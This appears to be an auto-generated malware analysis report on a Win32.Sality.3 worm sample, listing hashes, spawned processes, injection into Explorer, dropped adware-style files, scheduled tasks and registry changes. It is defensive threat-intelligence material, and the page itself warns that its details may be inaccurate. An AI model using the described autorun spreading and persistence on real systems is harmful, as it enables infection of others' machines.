Win32.Sality.3_df19badc8d

by malwarelabrobot on January 13th, 2015 in Malware Descriptions.

Win32.Sality.3 (B) (Emsisoft), Win32.Sality.3 (AdAware), Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Worm, Virus, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: df19badc8d07c6bee18a57e61ea387c2
SHA1: 2b7c6da2e61c98224b23f712beeaf74ba38c0787
SHA256: 3b08960f3416e9adf2f25fc702b4bbff4a716875de20f7035615ce17b717e588
SSDeep: 393216:Jm27XOLzs3pUzZyj2wps8oEmTRoUeBxI:Jm27gzs3pUzMjfGoUe
Size: 13067784 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: YourTemplateFinder
Created at: 2012-12-04 15:55:11
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Worm. A program that is primarily replicating on networks or removable drives.

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Worm creates the following process(es):

Ge-Force-codedownloader.exe:2504
Ge-Force-codedownloader.exe:2564
regsvr32.exe:2416
Khtmovq.exe:664
%original file name%.exe:1616
mscorsvw.exe:172
Ge-Force-bg.exe:2632

The Worm injects its code into the following process(es):

Explorer.EXE:2032

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Ge-Force-codedownloader.exe:2564 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\manifest[1].xml (25 bytes)

The process Khtmovq.exe:664 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\184[1].js (25 bytes)
%Program Files%\Ge-Force\utils.exe (86583 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (35246 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.job (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (415 bytes)
%Program Files%\Ge-Force\Ge-Force.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\288[1].js (551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (1 bytes)
%Program Files%\Ge-Force\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\337[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (3312 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\262[1].js (25 bytes)
%Program Files%\Ge-Force\Ge-Force-codedownloader.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (141808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (784 bytes)
%Program Files%\Ge-Force\Ge-Force-bho.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (5 bytes)
%Program Files%\Ge-Force\Ge-Force-bg.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (410 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB7.tmp (662466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\356[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\350[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (809 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (997 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (31281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\91[1].js (86817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (1552 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (14 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\ipgeoapi[1] (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\app_code[1].js (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\desktop.ini (67 bytes)
%Program Files%\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe (7726 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (0 bytes)

The process %original file name%.exe:1616 makes changes in the file system.
The Worm creates and/or writes to the following file(s):

%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (4404939 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0014C62D_Rar\%original file name%.exe (99596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (419460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (2426 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB4.tmp (0 bytes)

Registry activity

The process Ge-Force-codedownloader.exe:2504 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

